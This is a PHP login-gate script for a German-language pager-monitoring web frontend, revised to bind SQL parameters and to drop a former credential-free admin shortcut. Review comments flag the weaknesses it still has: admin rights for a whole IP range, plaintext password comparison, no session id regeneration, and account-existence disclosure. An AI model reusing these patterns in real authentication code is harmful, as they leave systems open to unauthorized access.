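<?php
/*
 * PHP Frontend for pocsag monitor
 *
 * Copyright (C) 2004-2005
 * Manuel Weiser (manuelw@fire-devils.org)
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
 */

/*
 * Login gate (included script).
 *
 * Decides how the current request is authenticated, in this order:
 *   1. by client IP range ($ip_start .. $ip_ende),
 *   2. WAP login with user name and WAP password (when $wap == 1),
 *   3. e-mailed one-time login code (default).
 * An unauthenticated request gets a login form or an error message and the
 * script exits.
 *
 * Reads $dbconn, $ip_start, $ip_ende, $ip_users, $wap, $meta and
 * $login_infotext and calls ip2str(), pass_erstellen(), mail_pass() and
 * gohome(). None of them is defined in this file; presumably the including
 * script provides them.
 *
 * Security changes compared with the previous revision:
 *   - every SQL statement binds its values as parameters instead of
 *     interpolating request data (form fields, login code, User-Agent);
 *   - the hard-coded "iam" query-parameter shortcut, which created an
 *     administrator session without any credential, has been removed;
 *   - an empty one-time code is rejected (used codes are reset to '' in the
 *     database, so '' must never be accepted as a credential);
 *   - a WAP login request without credentials is refused instead of falling
 *     through the gate;
 *   - PHP_SELF and the e-mail address are HTML-escaped before output;
 *   - database error details go to the error log, not to the client.
 *
 * NOTE(review): the session id is not regenerated after a successful login.
 * session_regenerate_id() needs unsent headers, which cannot be guaranteed
 * from here - add it where the session is started.
 */

if (!function_exists('login_db_query')) {
    /**
     * Runs one SQL statement with all values bound as string parameters.
     *
     * Uses mysqli_stmt_get_result(), which requires the mysqlnd driver.
     *
     * @param mysqli $dbconn open database connection
     * @param string $sql    statement text with ? placeholders
     * @param array  $params placeholder values, in order
     * @param bool   $fatal  true: log the error and end the request on failure;
     *                       false: return false on failure (best effort)
     *
     * @return mysqli_result|bool result set for a SELECT, true for a write,
     *                            false after a non-fatal failure
     */
    function login_db_query($dbconn, $sql, $params = array(), $fatal = true)
    {
        $stmt = mysqli_prepare($dbconn, $sql);
        $ok = ($stmt !== false);

        if ($ok && count($params) > 0) {
            // mysqli_stmt_bind_param() takes its values by reference.
            $bind = array($stmt, str_repeat('s', count($params)));
            foreach (array_keys($params) as $key) {
                $params[$key] = (string) $params[$key];
                $bind[] = &$params[$key];
            }
            $ok = call_user_func_array('mysqli_stmt_bind_param', $bind);
        }
        if ($ok) {
            $ok = mysqli_stmt_execute($stmt);
        }

        if (!$ok) {
            // Keep schema and query details out of the HTTP response.
            error_log('login: database error: ' . ($stmt ? mysqli_stmt_error($stmt) : mysqli_error($dbconn)));
            if ($fatal) {
                die('Datenbankfehler.');
            }
            return false;
        }

        $result = mysqli_stmt_get_result($stmt);

        // Write statements produce no result set.
        return ($result === false) ? true : $result;
    }
}

if (!function_exists('login_input')) {
    /**
     * Returns $source[$key] if it is a string, otherwise ''.
     * Array-valued request parameters are treated as absent.
     */
    function login_input($source, $key)
    {
        return (isset($source[$key]) && is_string($source[$key])) ? $source[$key] : '';
    }
}

if (!function_exists('login_html')) {
    /** Escapes a value for use in HTML text or a quoted attribute. */
    function login_html($text)
    {
        return htmlspecialchars((string) $text, ENT_QUOTES);
    }
}

// Prefixed names: an included script shares the variable scope of its caller.
$auth_remote = login_input($_SERVER, "REMOTE_ADDR");
$auth_agent  = login_input($_SERVER, "HTTP_USER_AGENT");
$auth_self   = login_html(login_input($_SERVER, "PHP_SELF"));

// Permission by IP
// NOTE(review): every address inside the range receives admin = 1, even when
// it has no entry in $ip_users. If the application runs behind a reverse
// proxy, REMOTE_ADDR is the proxy's address - confirm the range excludes it.
if ( (ip2str($ip_start) <= ip2str($auth_remote) && ip2str($auth_remote) <= ip2str($ip_ende)) && empty($_SESSION["name"]) ) {

    $_SESSION["admin"]   = '1';
    $_SESSION["mail"]    = 'root@localhost';
    $_SESSION["pmallow"] = '1';

    // Addresses without a mapping look up id '' as before, without reading
    // an undefined array index.
    $zack = '';
    if (array_key_exists($auth_remote, $ip_users)) {
        $_SESSION["userid"] = $ip_users[$auth_remote];
        $zack = $ip_users[$auth_remote];
    }

    $result = login_db_query(
        $dbconn,
        "SELECT a_name, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE id = ?",
        array($zack)
    );
    $row = mysqli_fetch_array($result);

    $_SESSION["name"]      = $row ? $row["a_name"] : null;
    $_SESSION["last_seen"] = (($row ? $row["last_seen"] : 0) - 200);

} elseif ( isset($wap) && $wap == 1 ) {

    ////////////////////////
    // Login via WAP
    ////////////////////////
    if (empty($_SESSION["name"])) {

        if (login_input($_GET, "mode") !== 'login') {
            echo '
<html>
<head>
<title>Wapsag</title>
'.$meta.'
</head>
<body>
<br><br>
<form name="form1" method="post" action="'.$auth_self.'?mode=login">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr> <td class="table_news_head"> Login</td> </tr>
<tr> <td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr> <td> Username:</td> <td width="20"> </td> <td><input name="a_name" type="text" id="a_name"></td> </tr>
<tr> <td> Passwort:</td> <td> </td> <td><input name="a_pass" type="password" id="a_pass"></td> </tr>
<tr> <td> </td> <td> </td> <td> <input type="submit" name="Submit" value="Einloggen"> </td> </tr>
</table>
</td> </tr>
</table>
</form>
</body>
</html>
';
            exit;
        }

        // NOTE(review): $_REQUEST also accepts the credentials from the query
        // string; kept so existing WAP clients continue to work.
        $auth_name = login_input($_REQUEST, "a_name");
        $auth_pass = login_input($_REQUEST, "a_pass");

        // NOTE(review): wap_pass is matched against the submitted value as
        // stored, which implies plaintext storage. Moving to password_hash() /
        // password_verify() needs a schema migration outside this file.
        $row = null;
        if ($auth_name !== '' && $auth_pass !== '') {
            $result = login_db_query(
                $dbconn,
                "SELECT id, a_name, a_admin, a_mail, real_name, wap_show, wap_rows, wap_def_orgfilter, wap_def_statfilter, wap_handy, login_count FROM admin_users WHERE a_name = ? AND wap_pass = ?",
                array($auth_name, $auth_pass)
            );
            $row = mysqli_fetch_array($result);
        }

        // Remember the first handset seen for this account (best effort).
        if ($row && !$row["wap_handy"]) {
            $result = login_db_query(
                $dbconn,
                "UPDATE admin_users SET wap_handy = ? WHERE a_name = ? AND wap_pass = ?",
                array($auth_agent, $auth_name, $auth_pass),
                false
            );
        }

        // Missing credentials, unknown user, wrong password or a_admin == 2:
        // refuse and stop, so the including page never runs unauthenticated.
        if (!$row || !$row["a_name"] || $row["a_admin"] == '2') {
            echo '
<html>
<head>
<title>Wapsag</title>
'.$meta.'
</head>
<body>
Login falsch!<br><a href="javascript:history.back()">zurück</a>
</body>
</html>';
            exit;
        }

        $_SESSION["userid"]     = $row["id"];
        $_SESSION["name"]       = $row["a_name"];
        $_SESSION["admin"]      = $row["a_admin"];
        $_SESSION["mail"]       = $row["a_mail"];
        $_SESSION["filter"]     = $row["wap_show"];
        $_SESSION["limit_to"]   = $row["wap_rows"];
        $_SESSION["org_filter"] = $row["wap_def_orgfilter"];
        $_SESSION["stat"]       = $row["wap_def_statfilter"];
        $_SESSION["pmallow"]    = '0';
        $login = 1;

        $datnow  = date("Y-m-d");
        $timenow = date("G:i");
        $ip      = $auth_remote;
        $agent   = $auth_agent;

        // Login journal (best effort). The User-Agent is client-controlled,
        // so it is bound as a parameter like every other value.
        $result = login_db_query(
            $dbconn,
            "INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES (?, ?, ?, ?, ?)",
            array($row["real_name"], $timenow, $datnow, $ip, $agent),
            false
        );

        $row["login_count"]++;
        $result = login_db_query(
            $dbconn,
            "UPDATE admin_users SET login_count = ? WHERE id = ?",
            array($row["login_count"], $row["id"])
        );
    }

} else {

    ////////////////////////
    // Security check
    ////////////////////////
    if (!isset($_GET["mode"])) $_GET["mode"] = "";
    $auth_mode = login_input($_GET, "mode");

    if ( !isset($_SESSION["name"]) && $auth_mode !== 'login' && !isset($_GET["login"]) ) {
        echo '
<br><br>
'.$login_infotext.'<br><br>
<form name="form1" method="post" action="'.$auth_self.'?mode=login">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr> <td class="table_news_head"> <b>Login</b></td> </tr>
<tr> <td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr> <td> Username:</td> <td width="20"> </td> <td><input name="a_name" type="text" id="a_name"></td> </tr>
<tr> <td> </td> <td> </td> <td><input type="submit" name="Submit" value="Zugang anfordern"></td> </tr>
</table>
</td> </tr>
</table>
</form>
';
        exit;

    } elseif (!isset($_SESSION["name"]) && $auth_mode === 'login') {

        // Request a one-time login code by user name.
        $result = login_db_query(
            $dbconn,
            "SELECT id, a_name, a_admin, a_mail FROM admin_users WHERE a_name = ?",
            array(login_input($_POST, "a_name"))
        );
        $row = mysqli_fetch_array($result);

        if ($row && $row["a_name"] && $row["a_admin"] != '2') {
            $login = 1;

            // NOTE(review): the code is the only credential for this login
            // path - confirm pass_erstellen() draws from a cryptographically
            // secure source. The code is stored as-is and has no expiry here.
            $pass = pass_erstellen(8);
            mail_pass($row["a_mail"], $pass);
            $result = login_db_query(
                $dbconn,
                "UPDATE admin_users SET login_pass = ? WHERE id = ?",
                array($pass, $row["id"])
            );

            // NOTE(review): this response confirms that the account exists and
            // shows its e-mail address to whoever submitted the user name.
            echo'<center><br><br><br>Eine EMail mit deinem Zugang wurde an <b>'.login_html($row["a_mail"]).'</b> versand.';
            exit;
        } else {
            echo 'Login falsch!<br><a href="javascript:history.back()">zurück</a>';
            exit;
        }

    } elseif (!isset($_SESSION["name"]) && $auth_mode === 'register') {
        echo '
<br><br>
<form name="form1" method="post" action="'.$auth_self.'?mode=doregister">
<table width="300" border="0" cellspacing="0" cellpadding="0" align="center">
<tr> <td class="table_news_head"> Erlaubnis anfordern</td> </tr>
<tr> <td class="table_news_body">
<table width="300" border="0" cellpadding="0" cellspacing="0">
<tr> <td> Username:</td> <td width="20"> </td> <td><input name="a_name" type="text" id="a_name"></td> </tr>
<tr> <td> EMail:</td> <td> </td> <td><input name="a_mail" type="text" id="a_mail"></td> </tr>
<tr> <td> </td> <td> </td> <td><input type="submit" name="Submit" value="Erlaubnis anfordern"></td> </tr>
</table>
</td> </tr>
</table>
</form>
';
        exit;
    }

    if (isset($_GET["login"])) {

        // Redeem a one-time login code. An empty code is never looked up:
        // redeemed codes are stored as '' (see the UPDATE below).
        $auth_code = login_input($_GET, "login");
        $row = null;
        if ($auth_code !== '') {
            $result = login_db_query(
                $dbconn,
                "SELECT id, a_name, a_admin, a_mail, real_name, login_count, pm_allow, DATE_FORMAT(last_seen, '%Y%m%d%H%i%s') AS last_seen FROM admin_users WHERE login_pass = ?",
                array($auth_code)
            );
            $row = mysqli_fetch_array($result);
        }

        if (!empty($row["a_name"])) {
            $_SESSION["userid"]    = $row["id"];
            $_SESSION["name"]      = $row["a_name"];
            $_SESSION["admin"]     = $row["a_admin"];
            $_SESSION["mail"]      = $row["a_mail"];
            $_SESSION["pmallow"]   = $row["pm_allow"];
            $_SESSION["last_seen"] = ($row["last_seen"] - 200);
            $login = 1;

            $datnow  = date("Y-m-d");
            $timenow = date("G:i");
            $ip      = $auth_remote;
            $agent   = $auth_agent;

            // Login journal (best effort); all values bound as parameters.
            $result = login_db_query(
                $dbconn,
                "INSERT INTO pocsag_logins (name, zeit, datum, ip, agent) VALUES (?, ?, ?, ?, ?)",
                array($row["real_name"], $timenow, $datnow, $ip, $agent),
                false
            );

            // Invalidate the code so it cannot be redeemed twice.
            $row["login_count"]++;
            $result = login_db_query(
                $dbconn,
                "UPDATE admin_users SET login_pass = '', login_count = ? WHERE id = ?",
                array($row["login_count"], $row["id"])
            );

            echo gohome("index.php");
        } else {
            echo'<center><br><br><br>Falscher oder schon benutzer Logincode.';
            exit;
        }
    }
}
?>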